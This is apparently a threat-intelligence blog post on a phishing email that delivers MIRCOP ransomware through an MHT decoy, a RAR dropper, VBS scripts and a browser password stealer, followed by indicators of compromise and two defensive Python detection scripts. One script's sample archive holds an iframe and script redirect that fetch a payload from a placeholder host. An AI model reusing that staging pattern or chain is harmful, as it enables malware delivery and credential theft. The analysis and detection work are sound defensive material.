Spooky Ransomware Steals Past SEGs in Under 15 Minutes
By Harsh Patel and Zachary Bailey, Cofense Phishing Defense Center
Dealing with a ransomware attack on any business, organization or individual can quickly turn into a nightmare scenario. Ransomware is typically a two-pronged attack: it denies the target access to their own computer and files, and it then extorts the target by demanding some form of payment to relinquish control.
This type of malware can be delivered through various methods, one of the most popular being phishing email. Over the past year, with the rise in ransomware attacks, Cofense has observed threat actors delivering reconnaissance and data-exfiltration tools ahead of the final ransom attack. In early November, the Cofense Phishing Defense Center (PDC) intercepted and analyzed one such email. It reached the inboxes of targets in an environment protected by a secure email gateway (SEG), and it delivered a Halloween-themed MIRCOP ransomware.
Figure 1: Email Body
Figure 1 shows that the email carries several suspicious indicators, such as a generic “from” domain and a subject line reading “undisclosed-recipients.” In the body, the threat actor suggests that communication on a previous arrangement was lost and asks for help with a “DWG following Supplies List,” which is hyperlinked to a Google Drive URL. Clicking that link downloads an MHT file.
Figure 2: MHT File
MHT (MIME HTML) is a single-file web page archive format that web browsers can save and open. Figure 2 shows that after opening the file the target is presented with a blurred-out, apparently stamped form; behind that decoy, the threat actor uses the MHT file to fetch the malware payload from hXXps://a[.]pomf[.]cat/gectpe.rar.
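Because an MHT file is just a multipart/related MIME message, the remote fetch that stages the payload can be pulled out of it without opening it in a browser. The following Python script is an added example for this post, not Cofense tooling or a file from the incident: it parses an archive with the standard library, lists the embedded parts by their Content-Location, and flags any URL in the HTML that points outside the archive to an archive or executable. The sample MHT is constructed for the example and the payload host (payload.example.invalid) is a placeholder, not the pomf[.]cat URL above.

```python
"""Triage an MHT (MIME HTML) web archive for the remote resources it will fetch.

An MHT file is a multipart/related MIME message: every saved resource is a
part with its own Content-Location. Anything the HTML references that is not
one of those parts is a remote fetch the browser makes when the file is opened,
which is exactly how a decoy page can stage a second-stage payload.
"""
import email
import email.policy
import re
from urllib.parse import urlparse

# Constructed sample archive for this example (not the real lure). The payload
# host is a placeholder; only the file name mirrors the incident's gectpe.rar.
SAMPLE_MHT = b"""Subject: DWG FOLLOWING SUPPLIES LIST
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="----=_Part_0"

------=_Part_0
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: file:///C:/Users/victim/Desktop/form.html

<html><body>
<img src=3D"blurred_form.png">
<iframe src=3D"https://payload.example.invalid/gectpe.rar" width=3D"0"></iframe>
<script>window.location=3D"https://payload.example.invalid/gectpe.rar";</script>
</body></html>

------=_Part_0
Content-Type: image/png
Content-Transfer-Encoding: base64
Content-Location: blurred_form.png

iVBORw0KGgo=
------=_Part_0--
"""

URL_RE = re.compile(r"""https?://[^\s"'<>()]+""", re.IGNORECASE)
# Extensions that a saved web page has no legitimate reason to load remotely.
SUSPECT_EXT = (".rar", ".zip", ".7z", ".iso", ".exe", ".dll", ".js", ".vbs", ".hta", ".scr")


def triage_mht(data: bytes) -> dict:
    """Return the archive's parts, every external URL, and the ones worth escalating."""
    msg = email.message_from_bytes(data, policy=email.policy.default)
    parts = []          # (content-type, Content-Location) of each embedded resource
    local = set()       # locations that resolve inside the archive itself
    external = set()    # URLs referenced from text parts

    for part in msg.walk():
        if part.is_multipart():
            continue
        location = part.get("Content-Location")
        location = str(location) if location else None
        parts.append((part.get_content_type(), location))
        if location:
            local.add(location)
        if part.get_content_maintype() != "text":
            continue  # binary resources (images, fonts) are not scanned for URLs
        body = part.get_content()  # decoded per the part's transfer encoding and charset
        for url in URL_RE.findall(body):
            external.add(url.rstrip(".,;"))

    external -= local  # anything still left is fetched from the network on open
    flagged = sorted(u for u in external
                     if urlparse(u).path.lower().endswith(SUSPECT_EXT))
    return {"parts": parts, "external_urls": sorted(external), "flagged": flagged}


if __name__ == "__main__":
    report = triage_mht(SAMPLE_MHT)
    for ctype, loc in report["parts"]:
        print(f"part: {ctype:<10} {loc}")
    for url in report["flagged"]:
        print(f"FLAG: remote archive/executable fetch -> {url}")
```

Run against a real sample, the `flagged` list is the set of URLs to block at the proxy and to pivot on; the `parts` list tells you whether the decoy form is fully embedded (as it is here) or also pulls images from an attacker-controlled host that would make a useful second indicator.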
Figure 3: RAR File
Figure 4: EXE File
As shown in Figure 3, the downloaded RAR file contains an EXE file (Figure 4). The executable is a DotNETLoader that uses VBS scripts to drop and run the MIRCOP ransomware in memory.
Figure 5: MIRCOP Ransomware Activated
After a few minutes, the ransomware begins taking a screenshot, locking files, changing the desktop background and running a program that harvests stored passwords from web browsers. MIRCOP is fully activated when the screen flashes and the desktop is replaced with the ransom note shown in Figure 5. The image dropped is extremely gory and, coupled with the ransom message, will most likely shock the user. The use of Skype as a negotiation channel is uncommon, as most organized ransomware gangs use dedicated sites or mobile chat apps.
MIRCOP ransomware, also known as Crypt888, encrypts users’ files to hold them hostage and promises a decryption method once the payment demand is met. In this attack, the threat actor’s instructions are given on the wallpaper. The user is unable to open any applications other than a few web browsers, which give them access to the email address used to contact the attacker. That contact is then used to arrange the payment required for the decryption tool the threat actor claims will unlock the files and applications.
Figure 6: Files Saved in Temp Folder
The file named Pl2.exe was originally named “Web Browser Pass View,” a tool known for retrieving passwords from the credential stores of common web browsers. The executable’s icon shows Internet Explorer, Google Chrome, Firefox and Opera, referencing its targets. Looking up the SHA256 hash of this executable on VirusTotal links it to dozens of malicious executables going back to June of this year.
The files stored in the Temp folder associated with the malware:
- Gbr.jpg – The screenshot that was taken after running the malware
- 888.vbs – VBS scripts to automatically detonate the ransomware
- MILKXC_LUCK COMPUTER.exe & x.exe – used to lock the files
- Pl2.exe – The password utility known as “Web Browser Pass View”
- PI2.txt – Where the passwords get stored
- UYNHIJ.vbs – The VBS script that’s run by the DotNETLoader
- Wl.jpg – Original image that replaces the current background
MIRCOP ransomware poses a threat to medium-sized organizations because it can lock the files on critical computer systems. Its opening lure is business-themed and makes use of a service, such as Google Drive, that enterprises use to deliver files. The rapid progression from the MHT payload to final encryption shows that this group is not concerned with being stealthy. Since the delivery of this ransomware is so simple, it is especially worrying that this email found its way into the inbox of an environment using a SEG.
In this case, a well-conditioned user quickly reported this email using Cofense Reporter, allowing the PDC to identify the threat and the organization to mitigate a potential incident. With Cofense Managed Phishing Detection and Response, provided by the PDC, enterprises gain our complete view of threats. Contact us to learn more.
Indicators of Compromise:
- DWG FOLLOWING SUPPLIES LIST_xcod..mht – 707213 bytes
- gectpe.rar – 808853 bytes
- ##% DWG FOLLOWING SUPPLIES LIST.exe – 1182021 bytes
- Pl2.exe – 227840 bytes
- BTVTLU_LUCK COMPUTER.exe – 781722 bytes
- 888.vbs – 280 bytes
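The Temp folder artifact list and the IOC list above are enough to sweep a suspect host. The Python script below is an added example for this post, not Cofense tooling: it walks a directory (normally the user’s %TEMP%) and reports files that match a known artifact name, a known IOC byte size (so a renamed copy is still caught), or a VBS script sitting in Temp. The locker executable appears on this page under two different six-letter prefixes (MILKXC_ and BTVTLU_), so the script assumes the prefix is random and matches it as a pattern; that assumption, the spelling of the password dump (both “PI2.txt” as listed and “Pl2.txt” to match Pl2.exe are checked), and the sample folder it builds are all constructed for the example.

```python
"""Sweep a directory (normally the user's %TEMP%) for the MIRCOP artifact set.

Added example, not Cofense tooling. Exact names and byte sizes come from the
artifact and IOC lists on this page. The locker executable appears under two
different six-letter prefixes on the page (MILKXC_ and BTVTLU_), so the prefix
is assumed to be random and matched as a pattern rather than a literal name.
"""
import re
import shutil
import tempfile
from pathlib import Path

# Artifact names from the Temp folder list, lower-cased for case-insensitive
# matching. The page spells the password dump "PI2.txt" while the tool that
# writes it is Pl2.exe, so both spellings are included (assumption).
KNOWN_NAMES = {"gbr.jpg", "888.vbs", "x.exe", "pl2.exe", "pl2.txt", "pi2.txt",
               "uynhij.vbs", "wl.jpg"}

# Byte sizes from the IOC list, matched regardless of file name so a renamed
# copy of the same file is still caught.
KNOWN_SIZES = {
    707213: "DWG FOLLOWING SUPPLIES LIST_xcod..mht",
    808853: "gectpe.rar",
    1182021: "##% DWG FOLLOWING SUPPLIES LIST.exe",
    227840: "Pl2.exe",
    781722: "BTVTLU_LUCK COMPUTER.exe",
    280: "888.vbs",
}

# Assumption: the locker is named <RANDOM>_LUCK COMPUTER.exe with a six-letter prefix.
LOCKER_RE = re.compile(r"^[A-Z]{6}_LUCK COMPUTER\.exe$", re.IGNORECASE)


def sweep(root) -> list:
    """Return (name, size, reasons) for every file that trips at least one rule."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        name, size = path.name, path.stat().st_size
        reasons = []
        if name.lower() in KNOWN_NAMES:
            reasons.append("known artifact name")
        if LOCKER_RE.match(name):
            reasons.append("locker name pattern")
        if size in KNOWN_SIZES:
            reasons.append(f"size matches IOC {KNOWN_SIZES[size]}")
        if path.suffix.lower() == ".vbs":
            reasons.append("VBS script in temp")  # both droppers on the page are VBS
        if reasons:
            findings.append((name, size, reasons))
    return sorted(findings)


def build_sample_temp() -> str:
    """Create a constructed Temp folder mimicking the infection, plus one benign file."""
    root = tempfile.mkdtemp(prefix="mircop_demo_")
    samples = {
        "Gbr.jpg": b"\xff\xd8\xff" + b"\x00" * 64,
        "888.vbs": b"'" + b"x" * 279,                        # 280 bytes, as in the IOC list
        "QWERTY_LUCK COMPUTER.exe": b"MZ" + b"\x00" * 100,   # prefix not seen on the page
        "Pl2.exe": b"MZ" + b"\x00" * 227838,                 # 227840 bytes, as in the IOC list
        "UYNHIJ.vbs": b"x" * 50,
        "benign.txt": b"hello",
    }
    for name, content in samples.items():
        (Path(root) / name).write_bytes(content)
    return root


def demo() -> dict:
    """Build the sample folder, sweep it, clean up, and return name -> reasons."""
    root = build_sample_temp()
    try:
        return {name: reasons for name, _, reasons in sweep(root)}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(f"{name:<28} {'; '.join(reasons)}")
```

On a live host, point `sweep()` at the real Temp directory instead of the constructed one; a size-only hit on a file with an unfamiliar name is worth hashing and submitting, since it is the case the name-based rules would otherwise miss.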
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.